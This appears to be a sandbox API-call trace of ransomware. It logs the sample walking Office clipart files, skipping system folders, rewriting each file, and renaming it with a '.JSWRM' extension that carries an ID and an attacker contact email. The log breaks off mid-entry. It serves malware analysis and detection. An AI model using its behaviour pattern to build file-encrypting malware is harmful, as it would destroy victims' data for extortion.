1 [0076.431] lstrcmpiW (lpString1="DD01180_.WMF", lpString2=".") returned 1 [0076.431] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="..") returned 1 [0076.431] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="...") returned 1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="windows") returned -1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="recovery") returned -1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="perflogs") returned -1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="documents and settings") returned -1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="system volume information") returned -1 [0076.432] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="msocache") returned -1 [0076.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01180_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01180_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01180_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01180_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01180_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01180_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0076.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.433] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2084) returned 1 [0076.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x22fd48 [0076.433] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0076.435] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.435] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0076.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.435] CloseHandle (hObject=0x314) returned 1 [0076.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0076.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0076.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0076.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0076.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0076.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.436] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0076.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.436] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01181_.WMF", cAlternateFileName="")) returned 1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2=".") returned 1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="..") returned 1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="...") returned 1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="windows") returned -1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="recovery") returned -1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="perflogs") returned -1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="documents and settings") returned -1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="system volume information") returned -1 [0076.436] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="msocache") returned -1 [0076.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0076.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01181_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01181_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01181_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0076.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0076.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01181_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01181_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01181_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0076.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.437] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1448) returned 1 [0076.438] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a0) returned 0x22fd48 [0076.438] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x5a0, lpOverlapped=0x0) returned 1 [0076.439] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.439] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x5a0, lpOverlapped=0x0) returned 1 [0076.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.440] CloseHandle (hObject=0x314) returned 1 [0076.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0076.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0076.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0076.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0076.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0076.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.440] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0076.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.441] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01182_.WMF", cAlternateFileName="")) returned 1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2=".") returned 1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="..") returned 1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="...") returned 1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="windows") returned -1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="recovery") returned -1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="perflogs") returned -1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="documents and settings") returned -1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="system volume information") returned -1 [0076.441] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="msocache") returned -1 [0076.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01182_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01182_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01182_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0076.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01182_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01182_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01182_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0076.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.442] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2996) returned 1 [0076.442] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbb0) returned 0x20ff68 [0076.442] ReadFile (in: hFile=0x314, lpBuffer=0x20ff68, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20ff68*, lpNumberOfBytesRead=0x345e89c*=0xbb0, lpOverlapped=0x0) returned 1 [0076.443] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.444] WriteFile (in: hFile=0x314, lpBuffer=0x20ff68*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20ff68*, lpNumberOfBytesWritten=0x345e898*=0xbb0, lpOverlapped=0x0) returned 1 [0076.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff68 | out: hHeap=0x1e0000) returned 1 [0076.444] CloseHandle (hObject=0x314) returned 1 [0076.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0076.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0076.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0076.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0076.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.445] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01183_.WMF", cAlternateFileName="")) returned 1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2=".") returned 1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="..") returned 1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="...") returned 1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="windows") returned -1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="recovery") returned -1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="perflogs") returned -1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="documents and settings") returned -1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="system volume information") returned -1 [0076.445] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="msocache") returned -1 [0076.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01183_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01183_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01183_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01183_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01183_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, 